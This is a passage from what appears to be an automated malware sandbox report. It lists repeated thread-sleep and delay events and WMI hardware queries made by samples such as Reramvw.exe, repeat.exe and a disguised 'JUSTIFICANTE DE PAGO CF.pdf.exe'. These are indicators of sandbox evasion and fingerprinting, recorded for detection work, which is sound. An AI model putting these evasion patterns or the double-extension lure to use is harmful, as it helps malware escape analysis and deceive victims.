                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598687s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598578s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598468s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598359s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598247s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -598097s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -597968s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 1868Thread sleep time: -597856s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 6416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -100000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 4368Thread sleep count: 2180 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99875s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 4368Thread sleep count: 7668 > 30Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99765s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99656s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99547s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99434s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99326s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99203s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99089s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98969s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98844s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98734s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98625s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98515s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98406s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98297s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98187s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98078s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97968s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97843s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97734s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97625s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97515s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97406s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97297s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97187s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -97078s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96968s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96859s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96750s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96640s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96531s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96421s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96312s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -96203s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99953s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99844s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99719s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99610s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99485s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99344s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99218s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99109s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -99000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98891s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98766s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98656s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98547s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98438s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5684Thread sleep time: -98313s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -6456360425798339s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 5800Thread sleep count: 370 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599874s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 5800Thread sleep count: 2757 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599750s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599637s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599516s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599406s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599297s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599188s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -599078s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598969s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598844s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598734s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598624s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598515s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598406s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598297s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598187s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3652Thread sleep time: -598078s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 2072Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1272Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep count: 36 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -33204139332677172s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -100000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99890s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3280Thread sleep count: 8062 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99781s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 3280Thread sleep count: 1786 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99672s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99562s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99453s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99344s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99234s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99124s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99015s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98906s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98797s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98687s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98577s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98469s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98359s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98250s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98140s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98031s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97922s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97812s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97703s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97594s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97484s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97375s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99968s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99859s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99750s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99640s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99531s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99422s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99312s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99203s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -99093s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98984s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98874s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98765s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98656s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98502s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98375s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98264s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -98041s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -97852s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -96578s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -96422s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -96312s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -96203s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -96092s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -95984s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -95874s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4816Thread sleep time: -95765s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -8301034833169293s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599875s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3712Thread sleep count: 2428 > 30
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3712Thread sleep count: 562 > 30
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599765s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599653s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599547s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599437s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599328s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599218s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -599110s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598985s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598860s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598735s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598610s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598485s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598360s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598219s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598109s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5320Thread sleep time: -598000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 5900Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep count: 43 > 30
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -39660499758475511s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -200000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 4788Thread sleep count: 1977 > 30
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99874s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 4788Thread sleep count: 7826 > 30
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99763s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99655s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99545s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99437s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99327s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99218s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99108s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98999s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98889s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98780s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98671s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98562s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98452s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98343s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98234s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98124s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98014s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97906s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97796s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97686s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97577s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97468s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97358s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99890s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99776s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99672s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99562s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99453s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99343s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99234s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99125s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99015s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98906s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98796s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98687s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98578s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98468s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98359s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98249s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98140s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98030s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97921s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97812s >= -30000s
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 100000
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99890
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99781
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99672
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99562
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99453
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99344
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99234
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99124
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99015
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98906
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98797
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98687
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98577
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98469
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98359
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98250
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98140
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98031
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97922
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97812
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97703
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97594
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97484
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97375
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99968
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99859
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99750
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99640
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99531
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99422
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99312
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99203
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 99093
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98984
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98874
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98765
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98656
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98502
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98375
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98264
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 98041
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 97852
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96578
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeThread delayed: delay time: 96422
